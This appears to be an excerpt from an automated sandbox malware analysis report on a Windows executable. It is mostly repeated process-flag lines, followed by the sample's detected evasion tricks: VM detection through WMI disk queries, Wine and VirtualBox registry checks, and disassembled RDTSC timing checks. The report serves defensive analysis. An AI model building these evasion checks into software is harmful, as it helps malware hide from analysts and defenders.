                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32AD second address: 6E32B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32B1 second address: 6E32D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B30h 0x00000007 jmp 00007F7290766B2Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32D3 second address: 6E32F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB5h 0x00000009 jc 00007F7290C62CA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32F4 second address: 6E3315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7290766B2Bh 0x0000000d jmp 00007F7290766B2Eh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E3315 second address: 6E3321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7290C62CA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E3321 second address: 6E3325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E254A second address: 6E255B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7290C62CA6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E255B second address: 6E25B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B37h 0x00000007 jno 00007F7290766B2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F7290766B26h 0x0000001a jmp 00007F7290766B2Bh 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007F7290766B36h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E25B3 second address: 6E25D9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7290C62CC0h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2714 second address: 6E275A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B36h 0x00000009 pop esi 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F7290766B36h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F7290766B26h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E275A second address: 6E2762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2A50 second address: 6E2A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7290766B7Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7290766B2Dh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2A7E second address: 6E2A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CAFh 0x00000007 je 00007F7290C62CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2A9A second address: 6E2AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F1D second address: 6E5F27 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F27 second address: 6E5F59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F7290766B34h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F7290766B2Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F59 second address: 6E5FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnl 00007F7290C62CB2h 0x00000011 jo 00007F7290C62CACh 0x00000017 jne 00007F7290C62CA6h 0x0000001d pop eax 0x0000001e add ecx, 638A2B8Eh 0x00000024 push 00000003h 0x00000026 and edi, 1002DD7Bh 0x0000002c push esi 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 mov edi, esi 0x00000032 push 00000003h 0x00000034 jp 00007F7290C62CA9h 0x0000003a or dh, FFFFFF9Dh 0x0000003d jmp 00007F7290C62CB0h 0x00000042 push 7C298416h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a pushad 0x0000004b popad 0x0000004c pop eax 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FB1 second address: 6E5FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290766B2Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FC1 second address: 6E5FFA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 43D67BEAh 0x00000013 sub dword ptr [ebp+150D1FF0h], esi 0x00000019 lea ebx, dword ptr [ebp+15253D8Ch] 0x0000001f mov dword ptr [ebp+150D24C1h], edi 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 jmp 00007F7290C62CAFh 0x0000002e pop esi 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FFA second address: 6E6010 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290766B28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F7290766B26h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E6054 second address: 6E60B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jng 00007F7290C62CAEh 0x0000000d nop 0x0000000e call 00007F7290C62CB1h 0x00000013 sub dword ptr [ebp+150D1FE6h], ecx 0x00000019 pop ecx 0x0000001a mov dx, 04A8h 0x0000001e push 00000000h 0x00000020 mov esi, dword ptr [ebp+150D2BEEh] 0x00000026 push 04ED1B32h 0x0000002b pushad 0x0000002c pushad 0x0000002d jmp 00007F7290C62CB9h 0x00000032 jng 00007F7290C62CA6h 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E60B9 second address: 6E60BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E6289 second address: 6E62FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7290C62CB0h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 6BAEA692h 0x00000012 mov edx, dword ptr [ebp+150D198Ch] 0x00000018 lea ebx, dword ptr [ebp+15253DA0h] 0x0000001e mov edi, 3BEA4B40h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 ja 00007F7290C62CBEh 0x0000002b push ecx 0x0000002c pushad 0x0000002d popad 0x0000002e pop ecx 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 jnp 00007F7290C62CA8h 0x00000038 pushad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F7290C62CB6h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7065B1 second address: 7065B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70461D second address: 704623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704623 second address: 704627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704A28 second address: 704A2F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704A2F second address: 704A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704BAC second address: 704BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704D2C second address: 704D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704D30 second address: 704D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7290C62CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F7290C62CAEh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704D4A second address: 704D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704D4F second address: 704D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704EC3 second address: 704ED7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F7290766B2Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 705040 second address: 705046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 705185 second address: 70518B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70518B second address: 705191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7052DF second address: 70530B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7290766B2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7290766B36h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70544D second address: 705451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6D08EB second address: 6D090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F7290766B32h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 705761 second address: 705775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 705F01 second address: 705F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7061C3 second address: 7061C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 706456 second address: 70645C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70B03C second address: 70B047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70B047 second address: 70B04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70B04B second address: 70B063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70D608 second address: 70D60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70D60C second address: 70D610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70D610 second address: 70D616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70D616 second address: 70D630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jp 00007F7290C62CB8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F7290C62CA6h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70BEB6 second address: 70BEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70BEBA second address: 70BEBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
